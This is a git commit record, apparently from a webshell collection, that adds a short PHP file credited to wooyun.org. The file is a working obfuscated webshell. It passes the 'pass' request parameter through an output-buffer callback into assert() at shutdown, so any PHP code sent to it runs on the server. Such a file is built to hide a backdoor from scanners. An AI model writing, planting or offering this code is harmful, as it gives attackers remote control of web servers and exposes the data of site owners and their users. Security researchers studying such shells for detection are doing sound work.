add w-ob_start02.php

author : isno
from : wooyun.org

success running PHP5.3.3 >=
This commit is contained in:
tennc 2015-10-29 20:30:34 +08:00
parent e046b28382
commit 0d5688e8eb

View file

@ -0,0 +1,5 @@
<?php
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
echo $_REQUEST['pass'];
ob_end_flush();
?>